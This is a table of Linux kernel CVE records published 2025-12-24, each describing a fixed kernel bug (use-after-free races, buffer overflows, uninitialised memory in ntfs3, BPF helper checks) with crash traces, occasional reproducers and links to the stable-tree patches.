| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtl818x: rtl8187: Fix potential buffer underflow in rtl8187_rx_cb() The rtl8187_rx_cb() calculates the rx descriptor header address by subtracting its size from the skb tail pointer. However, it does not validate if the received packet (skb->len from urb->actual_length) is large enough to contain this header. If a truncated packet is received, this will lead to a buffer underflow, reading memory before the start of the skb data area, and causing a kernel panic. Add length checks for both rtl8187 and rtl8187b descriptor headers before attempting to access them, dropping the packet cleanly if the check fails. | 2025-12-24 | not yet calculated | CVE-2025-68362 | https://git.kernel.org/stable/c/4758770a673c60d8f615809304d72e1432fa6355 https://git.kernel.org/stable/c/638d4148e166d114a4cd7becaae992ce1a815ed8 https://git.kernel.org/stable/c/5ebf0fe7eaef9f6173a4c6ea77c5353e21645d15 https://git.kernel.org/stable/c/b647d2574e4583c2e3b0ab35568f60c88e910840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Check skb->transport_header is set in bpf_skb_check_mtu The bpf_skb_check_mtu helper needs to use skb->transport_header when the BPF_MTU_CHK_SEGS flag is used: bpf_skb_check_mtu(skb, ifindex, &mtu_len, 0, BPF_MTU_CHK_SEGS) The transport_header is not always set. There is a WARN_ON_ONCE report when CONFIG_DEBUG_NET is enabled + skb->gso_size is set + bpf_prog_test_run is used: WARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071 skb_gso_validate_network_len bpf_skb_check_mtu bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch bpf_test_run bpf_prog_test_run_skb For a normal ingress skb (not test_run), skb_reset_transport_header is performed but there is plan to avoid setting it as described in commit 2170a1f09148 ("net: no longer reset transport_header in __netif_receive_skb_core()"). This patch fixes the bpf helper by checking skb_transport_header_was_set(). The check is done just before skb->transport_header is used, to avoid breaking the existing bpf prog. The WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next. | 2025-12-24 | not yet calculated | CVE-2025-68363 | https://git.kernel.org/stable/c/30ce906557a21adef4cba5901c8e995dc18263a9 https://git.kernel.org/stable/c/1c30e4afc5507f0069cc09bd561e510e4d97fbf7 https://git.kernel.org/stable/c/942268e2726ac7f16e3ec49dbfbbbe7cf5af9da5 https://git.kernel.org/stable/c/d946f3c98328171fa50ddb908593cf833587f725 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ocfs2: relax BUG() to ocfs2_error() in __ocfs2_move_extent() In '__ocfs2_move_extent()', relax 'BUG()' to 'ocfs2_error()' just to avoid crashing the whole kernel due to a filesystem corruption. | 2025-12-24 | not yet calculated | CVE-2025-68364 | https://git.kernel.org/stable/c/e5c2503696ec2e0dc7b2aee902dc859ccde39ddf https://git.kernel.org/stable/c/7abbe41d22a06aae00fd46d29f59dd40a01e988f https://git.kernel.org/stable/c/e5c52c320577cd405b251943ef77842dc6f303bf https://git.kernel.org/stable/c/8a7d58845fae061c62b50bc5eeb9bae4a1dedc3d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Initialize allocated memory before use KMSAN reports: Multiple uninitialized values detected: - KMSAN: uninit-value in ntfs_read_hdr (3) - KMSAN: uninit-value in bcmp (3) Memory is allocated by __getname(), which is a wrapper for kmem_cache_alloc(). This memory is used before being properly cleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to properly allocate and clear memory before use. | 2025-12-24 | not yet calculated | CVE-2025-68365 | https://git.kernel.org/stable/c/192e8ce302f14ac66259231dd10cede19858d742 https://git.kernel.org/stable/c/a8a3ca23bbd9d849308a7921a049330dc6c91398 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nbd: defer config unlock in nbd_genl_connect There is one use-after-free warning when running NBD_CMD_CONNECT and NBD_CLEAR_SOCK: nbd_genl_connect nbd_alloc_and_init_config // config_refs=1 nbd_start_device // config_refs=2 set NBD_RT_HAS_CONFIG_REF open nbd // config_refs=3 recv_work done // config_refs=2 NBD_CLEAR_SOCK // config_refs=1 close nbd // config_refs=0 refcount_inc -> uaf ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290 nbd_genl_connect+0x16d0/0x1ab0 genl_family_rcv_msg_doit+0x1f3/0x310 genl_rcv_msg+0x44a/0x790 The issue can be easily reproduced by adding a small delay before refcount_inc(&nbd->config_refs) in nbd_genl_connect(): mutex_unlock(&nbd->config_lock); if (!ret) { set_bit(NBD_RT_HAS_CONFIG_REF, &config->runtime_flags); + printk("before sleep\n"); + mdelay(5 * 1000); + printk("after sleep\n"); refcount_inc(&nbd->config_refs); nbd_connect_reply(info, nbd->index); } | 2025-12-24 | not yet calculated | CVE-2025-68366 | https://git.kernel.org/stable/c/c9b99c948b4fb014812afe7b5ccf2db121d22e46 https://git.kernel.org/stable/c/9a38306643874566d20f7aba7dff9e6f657b51a9 https://git.kernel.org/stable/c/c9e805f6a35d1dd189a9345595a5c20e87611942 https://git.kernel.org/stable/c/1649714b930f9ea6233ce0810ba885999da3b5d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse The following warning appears when running syzkaller, and this issue also exists in the mainline code. ------------[ cut here ]------------ list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100. WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130 Modules linked in: CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 RIP: 0010:__list_add_valid_or_report+0xf7/0x130 RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282 RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817 RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001 RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100 R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48 FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 80000000 Call Trace: <TASK> input_register_handler+0xb3/0x210 mac_hid_start_emulation+0x1c5/0x290 mac_hid_toggle_emumouse+0x20a/0x240 proc_sys_call_handler+0x4c2/0x6e0 new_sync_write+0x1b1/0x2d0 vfs_write+0x709/0x950 ksys_write+0x12a/0x250 do_syscall_64+0x5a/0x110 entry_SYSCALL_64_after_hwframe+0x78/0xe2 The WARNING occurs when two processes concurrently write to the mac-hid emulation sysctl, causing a race condition in mac_hid_toggle_emumouse(). Both processes read old_val=0, then both try to register the input handler, leading to a double list_add of the same handler. CPU0 CPU1 ------------------------- ------------------------- vfs_write() //write 1 vfs_write() //write 1 proc_sys_write() proc_sys_write() mac_hid_toggle_emumouse() mac_hid_toggle_emumouse() old_val = *valp // old_val=0 old_val = *valp // old_val=0 mutex_lock_killable() proc_dointvec() // *valp=1 mac_hid_start_emulation() input_register_handler() mutex_unlock() mutex_lock_killable() proc_dointvec() mac_hid_start_emulation() input_register_handler() //Trigger Warning mutex_unlock() Fix this by moving the old_val read inside the mutex lock region. | 2025-12-24 | not yet calculated | CVE-2025-68367 | https://git.kernel.org/stable/c/230621ffdb361d15cd3ef92d8b4fa8d314f4fad4 https://git.kernel.org/stable/c/388391dd1cc567fcf0b372b63d414c119d23e911 https://git.kernel.org/stable/c/48a7d427eb65922b3f17fbe00e2bbc7cb9eac381 https://git.kernel.org/stable/c/1e4b207ffe54cf33a4b7a2912c4110f89c73bf3f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: init bioset in mddev_init IO operations may be needed before md_run(), such as updating metadata after writing sysfs. Without bioset, this triggers a NULL pointer dereference as below: BUG: kernel NULL pointer dereference, address: 0000000000000020 Call Trace: md_update_sb+0x658/0xe00 new_level_store+0xc5/0x120 md_attr_store+0xc9/0x1e0 sysfs_kf_write+0x6f/0xa0 kernfs_fop_write_iter+0x141/0x2a0 vfs_write+0x1fc/0x5a0 ksys_write+0x79/0x180 __x64_sys_write+0x1d/0x30 x64_sys_call+0x2818/0x2880 do_syscall_64+0xa9/0x580 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Reproducer ``` mdadm -CR /dev/md0 -l1 -n2 /dev/sd[cd] echo inactive > /sys/block/md0/md/array_state echo 10 > /sys/block/md0/md/new_level ``` mddev_init() can only be called once per mddev, no need to test if bioset has been initialized anymore. | 2025-12-24 | not yet calculated | CVE-2025-68368 | https://git.kernel.org/stable/c/9d37fe37dfa0833a8768740f0575e0ffd793cb4a https://git.kernel.org/stable/c/381a3ce1c0ffed647c9b913e142b099c7e9d5afc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: init run lock for extend inode After setting the inode mode of $Extend to a regular file, executing the truncate system call will enter the do_truncate() routine, causing the run_lock uninitialized error reported by syzbot. Prior to patch 4e8011ffec79, if the inode mode of $Extend was not set to a regular file, the do_truncate() routine would not be entered. Add the run_lock initialization when loading $Extend. syzbot reported: INFO: trying to register non-static key. Call Trace: dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120 assign_lock_key+0x133/0x150 kernel/locking/lockdep.c:984 register_lock_class+0x105/0x320 kernel/locking/lockdep.c:1299 __lock_acquire+0x99/0xd20 kernel/locking/lockdep.c:5112 lock_acquire+0x120/0x360 kernel/locking/lockdep.c:5868 down_write+0x96/0x1f0 kernel/locking/rwsem.c:1590 ntfs_set_size+0x140/0x200 fs/ntfs3/inode.c:860 ntfs_extend+0x1d9/0x970 fs/ntfs3/file.c:387 ntfs_setattr+0x2e8/0xbe0 fs/ntfs3/file.c:808 | 2025-12-24 | not yet calculated | CVE-2025-68369 | https://git.kernel.org/stable/c/6e17555728bc469d484c59db4a0abc65c19bc315 https://git.kernel.org/stable/c/19164d8228317f3f1fe2662a9ba587cfe3b2d29e https://git.kernel.org/stable/c/ab5e8ebeee1caa4fcf8be7d8d62c0a7165469076 https://git.kernel.org/stable/c/be99c62ac7e7af514e4b13f83c891a3cccefaa48 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: coresight: tmc: add the handle of the event to the path The handle is essential for retrieving the AUX_EVENT of each CPU and is required in perf mode. It has been added to the coresight_path so that dependent devices can access it from the path when needed. The existing bug can be reproduced with: perf record -e cs_etm//k -C 0-9 dd if=/dev/zero of=/dev/null Showing an oops as follows: Unable to handle kernel paging request at virtual address 000f6e84934ed19e Call trace: tmc_etr_get_buffer+0x30/0x80 [coresight_tmc] (P) catu_enable_hw+0xbc/0x3d0 [coresight_catu] catu_enable+0x70/0xe0 [coresight_catu] coresight_enable_path+0xb0/0x258 [coresight] | 2025-12-24 | not yet calculated | CVE-2025-68370 | https://git.kernel.org/stable/c/faa8f38f7ccb344ace2c1f364efc70e3a12d32f3 https://git.kernel.org/stable/c/d0c9effd82f2c19b92acd07d357fac5f392d549a https://git.kernel.org/stable/c/aaa5abcc9d44d2c8484f779ab46d242d774cabcb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: smartpqi: Fix device resources accessed after device removal Correct possible race conditions during device removal. Previously, a scheduled work item to reset a LUN could still execute after the device was removed, leading to use-after-free and other resource access issues. This race condition occurs because the abort handler may schedule a LUN reset concurrently with device removal via sdev_destroy(), leading to use-after-free and improper access to freed resources. - Check in the device reset handler if the device is still present in the controller's SCSI device list before running; if not, the reset is skipped. - Cancel any pending TMF work that has not started in sdev_destroy(). - Ensure device freeing in sdev_destroy() is done while holding the LUN reset mutex to avoid races with ongoing resets. | 2025-12-24 | not yet calculated | CVE-2025-68371 | https://git.kernel.org/stable/c/eccc02ba1747501d92bb2049e3ce378ba372f641 https://git.kernel.org/stable/c/4e1acf1b6dd6dd0495bda139daafd7a403ae2dc1 https://git.kernel.org/stable/c/1a5c5a2f88e839af5320216a02ffb075b668596a https://git.kernel.org/stable/c/b518e86d1a70a88f6592a7c396cf1b93493d1aab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nbd: defer config put in recv_work There is one uaf issue in recv_work when running NBD_CLEAR_SOCK and NBD_CMD_RECONFIGURE: nbd_genl_connect // conf_ref=2 (connect and recv_work A) nbd_open // conf_ref=3 recv_work A done // conf_ref=2 NBD_CLEAR_SOCK // conf_ref=1 nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B) close nbd // conf_ref=1 recv_work B config_put // conf_ref=0 atomic_dec(&config->recv_threads); -> UAF Or only running NBD_CLEAR_SOCK: nbd_genl_connect // conf_ref=2 nbd_open // conf_ref=3 NBD_CLEAR_SOCK // conf_ref=2 close nbd nbd_release config_put // conf_ref=1 recv_work config_put // conf_ref=0 atomic_dec(&config->recv_threads); -> UAF Commit 87aac3a80af5 ("nbd: call nbd_config_put() before notifying the waiter") moved nbd_config_put() to run before waking up the waiter in recv_work, in order to ensure that nbd_start_device_ioctl() would not be woken up while nbd->task_recv was still uncleared. However, in nbd_start_device_ioctl(), after being woken up it explicitly calls flush_workqueue() to make sure all current works are finished. Therefore, there is no need to move the config put ahead of the wakeup. Move nbd_config_put() to the end of recv_work, so that the reference is held for the whole lifetime of the worker thread. This makes sure the config cannot be freed while recv_work is still running, even if clear + reconfigure interleave. In addition, we don't need to worry about recv_work dropping the last nbd_put (which causes deadlock): path A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT): connect // nbd_refs=1 (trigger recv_work) open nbd // nbd_refs=2 NBD_CLEAR_SOCK close nbd nbd_release nbd_disconnect_and_put flush_workqueue // recv_work done nbd_config_put nbd_put // nbd_refs=1 nbd_put // nbd_refs=0 queue_work path B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT): connect // nbd_refs=2 (trigger recv_work) open nbd // nbd_refs=3 NBD_CLEAR_SOCK // conf_refs=2 close nbd nbd_release nbd_config_put // conf_refs=1 nbd_put // nbd_refs=2 recv_work done // conf_refs=0, nbd_refs=1 rmmod // nbd_refs=0 Depends-on: e2daec488c57 ("nbd: Fix hungtask when nbd_config_put") | 2025-12-24 | not yet calculated | CVE-2025-68372 | https://git.kernel.org/stable/c/6b69593f72e1bfba6ca47ca8d9b619341fded7d6 https://git.kernel.org/stable/c/443a1721806b6ff6303b5229e9811d68172d622f https://git.kernel.org/stable/c/742012f6bf29553fdc460bf646a58df3a7b43d01 https://git.kernel.org/stable/c/9517b82d8d422d426a988b213fdd45c6b417b86d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: avoid repeated calls to del_gendisk There is a uaf problem which is found by case 23rdev-lifetime: Oops: general protection fault, probably for non-canonical address 0xdead000000000122 RIP: 0010:bdi_unregister+0x4b/0x170 Call Trace: <TASK> __del_gendisk+0x356/0x3e0 mddev_unlock+0x351/0x360 rdev_attr_store+0x217/0x280 kernfs_fop_write_iter+0x14a/0x210 vfs_write+0x29e/0x550 ksys_write+0x74/0xf0 do_syscall_64+0xbb/0x380 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7ff5250a177e The sequence is: 1. rdev remove path gets reconfig_mutex 2. rdev remove path release reconfig_mutex in mddev_unlock 3. md stop calls do_md_stop and sets MD_DELETED 4. rdev remove path calls del_gendisk because MD_DELETED is set 5. md stop path release reconfig_mutex and calls del_gendisk again So there is a race condition we should resolve. This patch adds a flag MD_DO_DELETE to avoid the race condition. | 2025-12-24 | not yet calculated | CVE-2025-68373 | https://git.kernel.org/stable/c/b4c5cf406062ad44cd178269571530c6435b2f3b https://git.kernel.org/stable/c/f0fae1debeb9102398ddf2ef69b4f5d395afafed https://git.kernel.org/stable/c/90e3bb44c0a86e245d8e5c6520206fa113acb1ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md: fix rcu protection in md_wakeup_thread We attempted to use RCU to protect the pointer 'thread', but directly passed the value when calling md_wakeup_thread(). This means that the RCU pointer has been acquired before rcu_read_lock(), which renders rcu_read_lock() ineffective and could lead to a use-after-free. | 2025-12-24 | not yet calculated | CVE-2025-68374 | https://git.kernel.org/stable/c/21989cb5034c835b212385a2afadf279d8069da0 https://git.kernel.org/stable/c/a4bd1caf591faeae44cb10b6517e7dacb5139bda https://git.kernel.org/stable/c/f98b191f78124405294481dea85f8a22a3eb0a59 https://git.kernel.org/stable/c/0dc76205549b4c25705e54345f211b9f66e018a0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: perf/x86: Fix NULL event access and potential PEBS record loss When intel_pmu_drain_pebs_icl() is called to drain PEBS records, the perf_event_overflow() could be called to process the last PEBS record. While perf_event_overflow() could trigger the interrupt throttle and stop all events of the group, like what the below call-chain shows. perf_event_overflow() -> __perf_event_overflow() ->__perf_event_account_interrupt() -> perf_event_throttle_group() -> perf_event_throttle() -> event->pmu->stop() -> x86_pmu_stop() The side effect of stopping the events is that all corresponding event pointers in cpuc->events[] array are cleared to NULL. Assume there are two PEBS events (event a and event b) in a group. When intel_pmu_drain_pebs_icl() calls perf_event_overflow() to process the last PEBS record of PEBS event a, interrupt throttle is triggered and all pointers of event a and event b are cleared to NULL. Then intel_pmu_drain_pebs_icl() tries to process the last PEBS record of event b and encounters NULL pointer access. To avoid this issue, move cpuc->events[] clearing from x86_pmu_stop() to x86_pmu_del(). It's safe since cpuc->active_mask or cpuc->pebs_enabled is always checked before access the event pointer from cpuc->events[]. | 2025-12-24 | not yet calculated | CVE-2025-68375 | https://git.kernel.org/stable/c/cf69b99805c263117305ac6dffbc85aaf9259d32 https://git.kernel.org/stable/c/6b089028bff1f2ff9e0c62b8f1faca1a620e5d6e https://git.kernel.org/stable/c/7e772a93eb61cb6265bdd1c5bde17d0f2718b452 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: coresight: ETR: Fix ETR buffer use-after-free issue When ETR is enabled as CS_MODE_SYSFS, if the buffer size is changed and enabled again, currently sysfs_buf will point to the newly allocated memory(buf_new) and free the old memory(buf_old). But the etr_buf that is being used by the ETR remains pointed to buf_old, not updated to buf_new. In this case, it will result in a memory use-after-free issue. Fix this by checking ETR's mode before updating and releasing buf_old, if the mode is CS_MODE_SYSFS, then skip updating and releasing it. | 2025-12-24 | not yet calculated | CVE-2025-68376 | https://git.kernel.org/stable/c/70acbc9c77686b7a521af6d7a543dcd9c324cf07 https://git.kernel.org/stable/c/cda077a19f5c8d6ec61e5b97deca203d95e3a422 https://git.kernel.org/stable/c/35501ac3c7d40a7bb9568c2f89d6b56beaf9bed3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ns: initialize ns_list_node for initial namespaces Make sure that the list is always initialized for initial namespaces. | 2025-12-24 | not yet calculated | CVE-2025-68377 | https://git.kernel.org/stable/c/e31c902d785411eb4a246fba2e8a32aa59d33ce2 https://git.kernel.org/stable/c/3dd50c58664e2684bd610a57bf3ab713cbb0ea91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix stackmap overflow check in __bpf_get_stackid() Syzkaller reported a KASAN slab-out-of-bounds write in __bpf_get_stackid() when copying stack trace data. The issue occurs when the perf trace contains more stack entries than the stack map bucket can hold, leading to an out-of-bounds write in the bucket's data array. | 2025-12-24 | not yet calculated | CVE-2025-68378 | https://git.kernel.org/stable/c/d1f424a77b6bd27b361737ed73df49a0158f1590 https://git.kernel.org/stable/c/2a008f6de163279deffd488c1deab081bce5667c https://git.kernel.org/stable/c/4669a8db976c8cbd5427fe9945f12c5fa5168ff3 https://git.kernel.org/stable/c/23f852daa4bab4d579110e034e4d513f7d490846 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure A NULL pointer dereference can occur in rxe_srq_chk_attr() when ibv_modify_srq() is invoked twice in succession under certain error conditions. The first call may fail in rxe_queue_resize(), which leads rxe_srq_from_attr() to set srq->rq.queue = NULL. The second call then triggers a crash (null deref) when accessing srq->rq.queue->buf->index_mask. Call Trace: <TASK> rxe_modify_srq+0x170/0x480 [rdma_rxe] ? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe] ? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs] ? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs] ib_uverbs_modify_srq+0x204/0x290 [ib_uverbs] ? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs] ? tryinc_node_nr_active+0xe6/0x150 ? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs] ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs] ? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs] ? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs] ib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs] ? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs] ib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs] ? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs] ? __pfx___raw_spin_lock_irqsave+0x10/0x10 ? __pfx_do_vfs_ioctl+0x10/0x10 ? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0 ? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10 ib_uverbs_ioctl+0x13e/0x220 [ib_uverbs] ? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs] __x64_sys_ioctl+0x138/0x1c0 do_syscall_64+0x82/0x250 ? fdget_pos+0x58/0x4c0 ? ksys_write+0xf3/0x1c0 ? __pfx_ksys_write+0x10/0x10 ? do_syscall_64+0xc8/0x250 ? __pfx_vm_mmap_pgoff+0x10/0x10 ? fget+0x173/0x230 ? fput+0x2a/0x80 ? ksys_mmap_pgoff+0x224/0x4c0 ? do_syscall_64+0xc8/0x250 ? do_user_addr_fault+0x37b/0xfe0 ? clear_bhb_loop+0x50/0xa0 ? clear_bhb_loop+0x50/0xa0 ? clear_bhb_loop+0x50/0xa0 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2025-12-24 | not yet calculated | CVE-2025-68379 | https://git.kernel.org/stable/c/b8f6eeb87a76b6fb1f6381b0b2894568e1b784f7 https://git.kernel.org/stable/c/5dbeb421e137824aa9bd8358bdfc926a3965fc0d https://git.kernel.org/stable/c/bc4c14a3863cc0e03698caec9a0cdabd779776ee https://git.kernel.org/stable/c/503a5e4690ae14c18570141bc0dcf7501a8419b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: fix peer HE MCS assignment In ath11k_wmi_send_peer_assoc_cmd(), peer's transmit MCS is sent to firmware as receive MCS while peer's receive MCS sent as transmit MCS, which goes against firmwire's definition. While connecting to a misbehaved AP that advertises 0xffff (meaning not supported) for 160 MHz transmit MCS map, firmware crashes due to 0xffff is assigned to he_mcs->rx_mcs_set field. Ext Tag: HE Capabilities [...] Supported HE-MCS and NSS Set [...] Rx and Tx MCS Maps 160 MHz [...] Tx HE-MCS Map 160 MHz: 0xffff Swap the assignment to fix this issue. As the HE rate control mask is meant to limit our own transmit MCS, it needs to go via he_mcs->rx_mcs_set field. With the aforementioned swapping done, change is needed as well to apply it to the peer's receive MCS. Tested-on: WCN6855 hw2.1 PCI WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41 Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1 | 2025-12-24 | not yet calculated | CVE-2025-68380 | https://git.kernel.org/stable/c/097c870b91817779e5a312c6539099a884b1fe2b https://git.kernel.org/stable/c/381096a417b7019896e93e86f4c585c592bf98e2 https://git.kernel.org/stable/c/6b1a0da75932353f66e710976ca85a7131f647ff https://git.kernel.org/stable/c/4a013ca2d490c73c40588d62712ffaa432046a04 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: asymmetric_keys - prevent overflow in asymmetric_key_generate_id Use check_add_overflow() to guard against potential integer overflows when adding the binary blob lengths and the size of an asymmetric_key_id structure and return ERR_PTR(-EOVERFLOW) accordingly. This prevents a possible buffer overflow when copying data from potentially malicious X.509 certificate fields that can be arbitrarily large, such as ASN.1 INTEGER serial numbers, issuer names, etc. | 2025-12-24 | not yet calculated | CVE-2025-68724 | https://git.kernel.org/stable/c/c73be4f51eed98fa0c7c189db8f279e1c86bfbf7 https://git.kernel.org/stable/c/6af753ac5205115e6c310c8c4236c01b59a1c44f https://git.kernel.org/stable/c/b7090a5c153105b9fd221a5a81459ee8cd5babd6 https://git.kernel.org/stable/c/df0845cf447ae1556c3440b8b155de0926cbaa56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Do not let BPF test infra emit invalid GSO types to stack Yinhao et al. reported that their fuzzer tool was able to trigger a skb_warn_bad_offload() from netif_skb_features() -> gso_features_check(). When a BPF program - triggered via BPF test infra - pushes the packet to the loopback device via bpf_clone_redirect() then mentioned offload warning can be seen. GSO-related features are then rightfully disabled. We get into this situation due to convert___skb_to_skb() setting gso_segs and gso_size but not gso_type. Technically, it makes sense that this warning triggers since the GSO properties are malformed due to the gso_type. Potentially, the gso_type could be marked non-trustworthy through setting it at least to SKB_GSO_DODGY without any other specific assumptions, but that also feels wrong given we should not go further into the GSO engine in the first place. The checks were added in 121d57af308d ("gso: validate gso_type in GSO handlers") because there were malicious (syzbot) senders that combine a protocol with a non-matching gso_type. If we would want to drop such packets, gso_features_check() currently only returns feature flags via netif_skb_features(), so one location for potentially dropping such skbs could be validate_xmit_unreadable_skb(), but then otoh it would be an additional check in the fast-path for a very corner case. Given bpf_clone_redirect() is the only place where BPF test infra could emit such packets, lets reject them right there. | 2025-12-24 | not yet calculated | CVE-2025-68725 | https://git.kernel.org/stable/c/fbea4c63b5385588cb44ab21f91e55e33c719a54 https://git.kernel.org/stable/c/04a899573fb87273a656f178b5f920c505f68875 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: aead - Fix reqsize handling Commit afddce13ce81d ("crypto: api - Add reqsize to crypto_alg") introduced cra_reqsize field in crypto_alg struct to replace type specific reqsize fields. It looks like this was introduced specifically for ahash and acomp from the commit description as subsequent commits add necessary changes in these alg frameworks. However, this is being recommended for use in all crypto algs instead of setting reqsize using crypto_*_set_reqsize(). Using cra_reqsize in aead algorithms, hence, causes memory corruptions and crashes as the underlying functions in the algorithm framework have not been updated to set the reqsize properly from cra_reqsize. [1] Add proper set_reqsize calls in the aead init function to properly initialize reqsize for these algorithms in the framework. [1]: https://gist.github.com/Pratham-T/24247446f1faf4b7843e4014d5089f6b | 2025-12-24 | not yet calculated | CVE-2025-68726 | https://git.kernel.org/stable/c/64377e66e187164bd6737112d07257f5f0feb681 https://git.kernel.org/stable/c/12b413f5460c393d1151a37f591140693eca0f84 https://git.kernel.org/stable/c/9b04d8f00569573796dd05397f5779135593eb24 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: Fix uninit buffer allocated by __getname() Fix uninit errors caused after buffer allocation given to 'de'; by initializing the buffer with zeroes. The fix was found by using KMSAN. | 2025-12-24 | not yet calculated | CVE-2025-68727 | https://git.kernel.org/stable/c/4b1fd82848fdf0e01b3320815b261006c1722c3e https://git.kernel.org/stable/c/d88d4b455b6794f48d7adad52593f1700c7bd50e https://git.kernel.org/stable/c/b40a4eb4a0543d49686a6e693745009dac3b86a9 https://git.kernel.org/stable/c/9948dcb2f7b5a1bf8e8710eafaf6016e00be3ad6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntfs3: fix uninit memory after failed mi_read in mi_format_new Fix a KMSAN un-init bug found by syzkaller. ntfs_get_bh() expects a buffer from sb_getblk(), that buffer may not be uptodate. We do not bring the buffer uptodate before setting it as uptodate. If the buffer were to not be uptodate, it could mean adding a buffer with un-init data to the mi record. Attempting to load that record will trigger KMSAN. Avoid this by setting the buffer as uptodate, if it's not already, by overwriting it. | 2025-12-24 | not yet calculated | CVE-2025-68728 | https://git.kernel.org/stable/c/7ce8f2028dfccb2161b905cf8ab85cdd9e93909c https://git.kernel.org/stable/c/46f2a881e5a7311d41551edb3915e4d4e8802341 https://git.kernel.org/stable/c/81ffe9a265df3e41534726b852ab08792e3d374d https://git.kernel.org/stable/c/73e6b9dacf72a1e7a4265eacca46f8f33e0997d6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Fix MSDU buffer types handling in RX error path Currently, packets received on the REO exception ring from unassociated peers are of MSDU buffer type, while the driver expects link descriptor type packets. These packets are not parsed further due to a return check on packet type in ath12k_hal_desc_reo_parse_err(), but the associated skb is not freed. This may lead to kernel crashes and buffer leaks. Hence to fix, update the RX error handler to explicitly drop MSDU buffer type packets received on the REO exception ring. This prevents further processing of invalid packets and ensures stability in the RX error handling path. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1 | 2025-12-24 | not yet calculated | CVE-2025-68729 | https://git.kernel.org/stable/c/5ff5a9d71cdc49c3400f30583a784ad0a17d01ec https://git.kernel.org/stable/c/ab0554f51e5f2b9506e8a09e8accd02f00056729 https://git.kernel.org/stable/c/36f9edbb9d0fc36c865c74f3c1ad8e1261ad3981 |
